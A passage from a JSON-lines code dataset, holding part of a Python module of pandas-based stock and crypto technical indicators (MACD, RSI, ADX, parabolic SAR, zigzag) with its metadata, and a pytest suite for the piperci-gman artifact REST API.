DonCh = DonCh.shift(n - 1)\n return DonCh\n\n#Standard Deviation\ndef STDDEV(df, n):\n return pd.Series(pd.rolling_std(df['close'], n), name = 'STD_' + str(n))\n\n\n\n\nfrom functools import wraps\n\nfrom pandas import DataFrame, Series\nfrom pandas.stats import moments\n\n\ndef series_indicator(col):\n def inner_series_indicator(f):\n @wraps(f)\n def wrapper(s, *args, **kwargs):\n if isinstance(s, DataFrame):\n s = s[col]\n return f(s, *args, **kwargs)\n return wrapper\n return inner_series_indicator\n\n\ndef _wilder_sum(s, n):\n s = s.dropna()\n\n nf = (n - 1) / n\n ws = [np.nan]*(n - 1) + [s[n - 1] + nf*sum(s[:n - 1])]\n\n for v in s[n:]:\n ws.append(v + ws[-1]*nf)\n\n return Series(ws, index=s.index)\n\n\n@series_indicator('high')\ndef hhv(s, n):\n return moments.rolling_max(s, n)\n\n\n@series_indicator('low')\ndef llv(s, n):\n return moments.rolling_min(s, n)\n\n\n@series_indicator('close')\ndef ema(s, n, wilder=False):\n span = n 
if not wilder else 2*n - 1\n return moments.ewma(s, span=span)\n\n\n@series_indicator('close')\ndef macd(s, nfast=12, nslow=26, nsig=9, percent=True):\n fast, slow = ema(s, nfast), ema(s, nslow)\n\n if percent:\n macd = 100*(fast / slow - 1)\n else:\n macd = fast - slow\n\n sig = ema(macd, nsig)\n hist = macd - sig\n\n return DataFrame(dict(macd=macd, signal=sig, hist=hist,\n fast=fast, slow=slow))\n\n\ndef aroon(s, n=25):\n up = 100 * moments.rolling_apply(s.high, n + 1, lambda x: x.argmax()) / n\n dn = 100 * moments.rolling_apply(s.low, n + 1, lambda x: x.argmin()) / n\n\n return DataFrame(dict(up=up, down=dn))\n\n\n@series_indicator('close')\ndef rsi(s, n=14):\n diff = s.diff()\n which_dn = diff < 0\n\n up, dn = diff, diff*0\n up[which_dn], dn[which_dn] = 0, -up[which_dn]\n\n emaup = ema(up, n, wilder=True)\n emadn = ema(dn, n, wilder=True)\n\n return 100 * emaup/(emaup + emadn)\n\n\ndef stoch(s, nfastk=14, nfullk=3, nfulld=3):\n if not isinstance(s, DataFrame):\n s = DataFrame(dict(high=s, low=s, close=s))\n\n hmax, lmin = hhv(s, nfastk), llv(s, nfastk)\n\n fastk = 100 * (s.close - lmin)/(hmax - lmin)\n fullk = moments.rolling_mean(fastk, nfullk)\n fulld = moments.rolling_mean(fullk, nfulld)\n\n return DataFrame(dict(fastk=fastk, fullk=fullk, fulld=fulld))\n\n\n@series_indicator('close')\ndef dtosc(s, nrsi=13, nfastk=8, nfullk=5, nfulld=3):\n srsi = stoch(rsi(s, nrsi), nfastk, nfullk, nfulld)\n return DataFrame(dict(fast=srsi.fullk, slow=srsi.fulld))\n\n\ndef atr(s, n=14):\n cs = s.close.shift(1)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n\n return ema(tr, n, wilder=True)\n\n\ndef cci(s, n=20, c=0.015):\n if isinstance(s, DataFrame):\n s = s[['high', 'low', 'close']].mean(axis=1)\n\n mavg = moments.rolling_mean(s, n)\n mdev = moments.rolling_apply(s, n, lambda x: np.fabs(x - x.mean()).mean())\n\n return (s - mavg)/(c * mdev)\n\n\ndef cmf(s, n=20):\n clv = (2*s.close - s.high - s.low) / (s.high - s.low)\n vol = s.volume\n\n return moments.rolling_sum(clv*vol, n) / moments.rolling_sum(vol, n)\n\n\ndef force(s, n=2):\n return ema(s.close.diff()*s.volume, n)\n\n\n@series_indicator('close')\ndef kst(s, r1=10, r2=15, r3=20, r4=30, n1=10, n2=10, n3=10, n4=15, nsig=9):\n rocma1 = moments.rolling_mean(s / s.shift(r1) - 1, n1)\n rocma2 = moments.rolling_mean(s / s.shift(r2) - 1, n2)\n rocma3 = moments.rolling_mean(s / s.shift(r3) - 1, n3)\n rocma4 = moments.rolling_mean(s / s.shift(r4) - 1, n4)\n\n kst = 100*(rocma1 + 2*rocma2 + 3*rocma3 + 4*rocma4)\n sig = moments.rolling_mean(kst, nsig)\n\n return DataFrame(dict(kst=kst, signal=sig))\n\n\ndef ichimoku(s, n1=9, n2=26, n3=52):\n conv = (hhv(s, n1) + llv(s, n1)) / 2\n base = (hhv(s, n2) + llv(s, n2)) / 2\n\n spana = (conv + base) / 2\n spanb = (hhv(s, n3) + llv(s, n3)) / 2\n\n return DataFrame(dict(conv=conv, base=base, spana=spana.shift(n2),\n spanb=spanb.shift(n2), lspan=s.close.shift(-n2)))\n\n\ndef ultimate(s, n1=7, n2=14, n3=28):\n cs = s.close.shift(1)\n bp = s.close - s.low.combine(cs, min)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n\n avg1 = moments.rolling_sum(bp, n1) / moments.rolling_sum(tr, n1)\n avg2 = moments.rolling_sum(bp, n2) / moments.rolling_sum(tr, n2)\n avg3 = moments.rolling_sum(bp, n3) / moments.rolling_sum(tr, n3)\n\n return 100*(4*avg1 + 2*avg2 + avg3) / 7\n\n\ndef auto_envelope(s, nema=22, nsmooth=100, ndev=2.7):\n sema = ema(s.close, nema)\n mdiff = s[['high','low']].sub(sema, axis=0).abs().max(axis=1)\n csize = moments.ewmstd(mdiff, nsmooth)*ndev\n\n return DataFrame(dict(ema=sema, lenv=sema 
- csize, henv=sema + csize))\n\n\n@series_indicator('close')\ndef bbands(s, n=20, ndev=2):\n    mavg = moments.rolling_mean(s, n)\n    mstd = moments.rolling_std(s, n)\n\n    hband = mavg + ndev*mstd\n    lband = mavg - ndev*mstd\n\n    return DataFrame(dict(ma=mavg, lband=lband, hband=hband))\n\n\ndef safezone(s, position, nmean=10, npen=2.0, nagg=3):\n    if isinstance(s, DataFrame):\n        s = s.low if position == 'long' else s.high\n\n    sgn = -1.0 if position == 'long' else 1.0\n\n    # Compute the average upside/downside penetration\n    pen = moments.rolling_apply(\n        sgn*s.diff(), nmean,\n        lambda x: x[x > 0].mean() if (x > 0).any() else 0\n    )\n\n    stop = s + sgn*npen*pen\n    return hhv(stop, nagg) if position == 'long' else llv(stop, nagg)\n\n\ndef sar(s, af=0.02, amax=0.2):\n    high, low = s.high, s.low\n\n    # Starting values\n    sig0, xpt0, af0 = True, high[0], af\n    sar = [low[0] - (high - low).std()]\n\n    for i in range(1, len(s)):\n        sig1, xpt1, af1 = sig0, xpt0, af0\n\n        lmin = min(low[i - 1], low[i])\n        lmax = max(high[i - 1], high[i])\n\n        if sig1:\n            sig0 = low[i] > sar[-1]\n            xpt0 = max(lmax, xpt1)\n        else:\n            sig0 = high[i] >= sar[-1]\n            xpt0 = min(lmin, xpt1)\n\n        if sig0 == sig1:\n            sari = sar[-1] + (xpt1 - sar[-1])*af1\n            af0 = min(amax, af1 + af)\n\n            if sig0:\n                af0 = af0 if xpt0 > xpt1 else af1\n                sari = min(sari, lmin)\n            else:\n                af0 = af0 if xpt0 < xpt1 else af1\n                sari = max(sari, lmax)\n        else:\n            af0 = af\n            sari = xpt0\n\n        sar.append(sari)\n\n    return Series(sar, index=s.index)\n\n\ndef adx(s, n=14):\n    cs = s.close.shift(1)\n    tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n    trs = _wilder_sum(tr, n)\n\n    up = s.high - s.high.shift(1)\n    dn = s.low.shift(1) - s.low\n\n    pos = ((up > dn) & (up > 0)) * up\n    neg = ((dn > up) & (dn > 0)) * dn\n\n    dip = 100 * _wilder_sum(pos, n) / trs\n    din = 100 * _wilder_sum(neg, n) / trs\n\n    dx = 100 * np.abs((dip - din)/(dip + din))\n    adx = ema(dx, n, wilder=True)\n\n    return DataFrame(dict(adx=adx, dip=dip, din=din))\n\n\ndef chandelier(s, position, n=22, npen=3):\n    if position == 'long':\n        return hhv(s, n) - npen*atr(s, n)\n    else:\n        return llv(s, n) + npen*atr(s, n)\n\n\ndef vortex(s, n=14):\n    ss = s.shift(1)\n\n    tr = s.high.combine(ss.close, max) - s.low.combine(ss.close, min)\n    trn = moments.rolling_sum(tr, n)\n\n    vmp = np.abs(s.high - ss.low)\n    vmm = np.abs(s.low - ss.high)\n\n    vip = moments.rolling_sum(vmp, n) / trn\n    vin = moments.rolling_sum(vmm, n) / trn\n\n    return DataFrame(dict(vin=vin, vip=vip))\n\n\n@series_indicator('close')\ndef gmma(s, nshort=[3, 5, 8, 10, 12, 15],\n         nlong=[30, 35, 40, 45, 50, 60]):\n    short = {str(n): ema(s, n) for n in nshort}\n    long = {str(n): ema(s, n) for n in nlong}\n\n    return DataFrame(short), DataFrame(long)\n\n\ndef zigzag(s, pct=5):\n    ut = 1 + pct / 100\n    dt = 1 - pct / 100\n\n    ld = s.index[0]\n    lp = s.close[ld]\n    tr = None\n\n    zzd, zzp = [ld], [lp]\n\n    for ix, ch, cl in zip(s.index, s.high, s.low):\n        # No initial trend\n        if tr is None:\n            if ch / lp > ut:\n                tr = 1\n            elif cl / lp < dt:\n                tr = -1\n        # Trend is up\n        elif tr == 1:\n            # New high\n            if ch > lp:\n                ld, lp = ix, ch\n            # Reversal\n            elif cl / lp < dt:\n                zzd.append(ld)\n                zzp.append(lp)\n\n                tr, ld, lp = -1, ix, cl\n        # Trend is down\n        else:\n            # New low\n            if cl < lp:\n                ld, lp = ix, cl\n            # Reversal\n            elif ch / lp > ut:\n                zzd.append(ld)\n                zzp.append(lp)\n\n                tr, ld, lp = 1, ix, ch\n\n    # Extrapolate the current trend\n    if zzd[-1] != s.index[-1]:\n        zzd.append(s.index[-1])\n\n        if tr is None:\n            zzp.append(s.close[zzd[-1]])\n        elif tr == 1:\n            zzp.append(s.high[zzd[-1]])\n        else:\n            
zzp.append(s.low[zzd[-1]])\n\n return Series(zzp, index=zzd)\n\n", "repo_name": "mainyaa/bitmech", "sub_path": "bitmech/indicators.py", "file_name": "indicators.py", "file_ext": "py", "file_size_in_byte": 22912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.Series", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 114, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 117, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 135, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 136, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 143, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 144, "usage_type": "call"}, {"api_name": 
"pandas.Series", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 192, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 192, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 203, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 207, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 228, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 260, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 280, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 282, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 283, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 284, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 285, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 295, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 315, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 317, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 333, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 334, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 334, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 339, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 362, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 368, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 368, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 369, "usage_type": "call"}, 
{"api_name": "pandas.rolling_mean", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 398, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 404, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 404, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 419, "usage_type": "argument"}, {"api_name": "functools.wraps", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 430, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_max", "line_number": 440, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 440, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_min", "line_number": 445, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 445, "usage_type": "name"}, {"api_name": "pandas.stats.moments.ewma", "line_number": 451, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 451, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 466, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 471, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 471, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 472, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 472, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 474, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 492, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 493, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 498, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 498, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 499, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 499, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 501, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 507, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 518, "usage_type": "argument"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 521, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 521, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 522, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 522, "usage_type": "name"}, {"api_name": "numpy.fabs", "line_number": 522, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 531, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 531, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 540, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 540, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 541, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 541, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 542, "usage_type": "call"}, {"api_name": 
"pandas.stats.moments", "line_number": 542, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 543, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 543, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 546, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 546, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 548, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 558, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 567, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 567, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 568, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 568, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 569, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 569, "usage_type": "name"}, {"api_name": "pandas.stats.moments.ewmstd", "line_number": 577, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 577, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 579, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_mean", "line_number": 584, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 584, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_std", "line_number": 585, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 585, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 590, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 594, "usage_type": "argument"}, {"api_name": "pandas.stats.moments.rolling_apply", "line_number": 600, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 600, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 645, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 662, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 665, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 679, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 679, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 681, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 682, "usage_type": "call"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 684, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 684, "usage_type": "name"}, {"api_name": "pandas.stats.moments.rolling_sum", "line_number": 685, "usage_type": "call"}, {"api_name": "pandas.stats.moments", "line_number": 685, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 687, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 696, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 750, "usage_type": "call"}]}
+{"seq_id": "22389621896", "text": "import datetime\n\nimport pytest\n\nfrom piperci_gman.artman import ArtMan\nfrom piperci_gman.orm.models import Artifact, Task, TaskEvent, db\n\n_artifacts = [\n {'uri': 'https://someminio.example.com/art1',\n 'sri': 'sha256-sCDaaxdshXhK4sA/v4dMHiMWhtGyQwA1fP8PgrN0O5g=',\n 'sri-urlsafe':\n 'c2hhMjU2LXNDRGFheGRzaFhoSzRzQS92NGRNSGlNV2h0R3lRd0ExZlA4UGdyTjBPNWc9',\n 'type': 'artifact',\n 'caller': 'pytest'},\n {'uri': 'https://someminio.example.com/art2',\n 'sri': 'sha256-jrT+J2yEC8wfUr6N/YxxbR/ux5y2GriIqXsySl5uVK8=',\n 'sri-urlsafe':\n 'c2hhMjU2LWpyVCtKMnlFQzh3ZlVyNk4vWXh4YlIvdXg1eTJHcmlJcVhzeVNsNXVWSzg9',\n 'type': 'source',\n 'caller': 'pytest'},\n {'uri': 'https://someminio.example.com/art1',\n 'sri': 'sha256-sCDaaxdshXhK4sA/v4dMHiMWhtGyQwA1fP8PgrN0O5g=',\n 'sri-urlsafe':\n 'c2hhMjU2LXNDRGFheGRzaFhoSzRzQS92NGRNSGlNV2h0R3lRd0ExZlA4UGdyTjBPNWc9',\n 'type': 'artifact',\n 'caller': 'pytest',\n 'task_id': 'New'},\n ]\n\n\ndef formateach(data, values):\n i = 0\n for k, v in data.items():\n try:\n data[k] = v.format(values[i])\n i += 1\n except IndexError:\n raise ValueError('Ran out of values to fill dict')\n\n\n@pytest.fixture\ndef artifact(api, client, testtask):\n task = testtask()\n data = {'task_id': task.json['task']['task_id']}\n data.update(_artifacts[0])\n resp = client.post(api.url_for(ArtMan), json=data)\n return resp.json, data\n\n\n@pytest.fixture\ndef artifacts(api, client, testtask):\n task = testtask()\n arts = []\n\n for artifact in _artifacts:\n if 'task_id' in artifact and artifact['task_id'] == 'New':\n _task = testtask()\n else:\n _task = task\n\n data = {}\n data.update(artifact)\n data['task_id'] = _task.json['task']['task_id']\n\n resp = client.post(api.url_for(ArtMan), json=data)\n # assert resp.status_code == 200\n if resp.status_code != 200:\n pytest.fail(str(resp.json) + str(data))\n arts.append((resp,\n data))\n\n return arts\n\n\ndef test_get_artifact(api, client, artifacts):\n\n for artifact in artifacts:\n art_id = artifact[0].json['artifact_id']\n resp = client.get(f'/artifact/{art_id}')\n assert resp.status_code == 200\n\n\ndef test_get_artifact_bad_request(api, client):\n resp = client.get('/artifact')\n assert resp.status_code == 400\n\n\ndef test_get_bad_artifact(api, client, artifacts):\n resp = client.get(f'/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 404\n\n\ndef test_get_artifacts_by_task_id(api, client, artifact):\n task_id = artifact[0]['task']['task_id']\n\n resp = client.get(api.url_for(ArtMan, task_id=task_id))\n assert len(resp.json) == 1\n assert resp.json[0]['task']['task_id'] == task_id\n\n\ndef test_get_artifacts_by_bad_task_id(api, client, artifact):\n task_id = '31a122e8-9ba8-4f60-a9fb-490c66fd4b0a'\n\n resp = client.get(api.url_for(ArtMan, task_id=task_id))\n assert resp.status_code == 404\n\n\ndef test_get_artifact_by_bad_sri(api, client, artifact):\n bad_sri = 'c2hhMjU2LXZGYXRjZXlXYUU5QWtzM045b3VSVXRiYTFtd3JJSGRFVkx0aTg4YXRJdmM9'\n resp = client.get(f'/artifact/sri/{bad_sri}')\n assert resp.status_code == 404\n\n\ndef test_get_artifacts_by_sri(api, client, artifacts):\n resp = client.get(f'/artifact/sri/{artifacts[0][1][\"sri-urlsafe\"]}')\n assert resp.status_code == 200\n assert len(resp.json) == 2\n\n\ndef test_head_artifact_bad_request(api, client):\n resp = client.head('/artifact')\n assert resp.status_code == 400\n\n\ndef test_head_artifact(api, client, artifacts):\n\n for artifact in artifacts:\n art_id = artifact[0].json['artifact_id']\n resp = 
client.head(f'/artifact/{art_id}')\n assert resp.status_code == 200\n assert resp.headers['x-gman-artifact-status'] == 'unknown'\n\n\ndef test_head_bad_artifact(api, client, artifacts):\n\n resp = client.head(f'/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 404\n\n\ndef test_head_artifacts_by_sri(api, client, artifacts):\n resp = client.head(f'/artifact/sri/{artifacts[0][1][\"sri-urlsafe\"]}')\n assert resp.status_code == 200\n assert int(resp.headers['x-gman-artifacts']) == 2\n\n\ndef test_head_artifacts_for_task_id(api, client, artifact):\n task_id = artifact[0]['task']['task_id']\n\n resp = client.head(api.url_for(ArtMan, task_id=task_id))\n assert int(resp.headers['x-gman-artifacts']) == 1\n\n\ndef test_put_artifact(api, client):\n\n resp = client.put(api.url_for(ArtMan))\n\n assert resp.status_code == 405\n\n\ndef test_post_artifact_no_task(api, client):\n art = {'task_id': '7d394a53-6f45-4847-bfd1-105eef07dd08'}\n\n art.update(_artifacts[0])\n resp = client.post(api.url_for(ArtMan), json=art)\n\n assert resp.status_code == 404, 'Code failed to check that the task exists'\n assert 'errors' in resp.json, 'Missing expected errors response'\n assert 'task_id' in resp.json['errors'], (\n 'Did not throw the correct error for this test')\n\n\ndef test_post_bad_artifact_url(api, client):\n\n resp = client.post('/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 400\n\n\ndef test_post_same_artifact_twice(api, client, artifact):\n\n art = {'task_id': artifact[0]['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n\n assert resp.status_code == 409\n\n\n@pytest.mark.parametrize('dissallowed', ('artifact_id', 'timestamp',\n 'status', 'event_id'))\ndef test_post_dissallowed_field(api, client, dissallowed):\n\n art = _artifacts[0].copy()\n art[dissallowed] = 'Some value'\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 422\n\n\ndef test_post_field_value_errors(api, client):\n\n art = _artifacts[0].copy()\n art['type'] = 'asdfasdfs'\n art['task_id'] = 1234\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 422\n\n\ndef test_raw_artifact_bad_hash(testtask):\n task_resp = testtask()\n task = Task().get(Task.task_id == task_resp.json['task']['task_id'])\n\n event = TaskEvent.create(task=task,\n message='testing creating an artifact',\n status='info',\n timestamp=datetime.datetime.now())\n with pytest.raises(ValueError):\n Artifact().create(\n task=task,\n event_id=event,\n type='log',\n status='unknown',\n sri='some non sri value',\n uri='https://www.example.com'\n )\n\n\ndef test_failed_artifact_create_no_table(api, client, monkeypatch, testtask):\n task = testtask()\n\n db.drop_tables([Artifact])\n\n art = {'task_id': task.json['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 500\n\n\ndef test_failed_artifact_create_IDK(api, client, monkeypatch, testtask):\n task = testtask()\n\n def myfunc(*args, **kwargs):\n kwargs['uri'] = {'not a valid thing'}\n return None\n\n monkeypatch.setattr('piperci_gman.orm.models.Artifact.create', myfunc)\n\n art = {'task_id': task.json['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 500\n", "repo_name": "dreamteamrepos/piperci-gman", "sub_path": "tests/test_artifact.py", "file_name": "test_artifact.py", "file_ext": "py", 
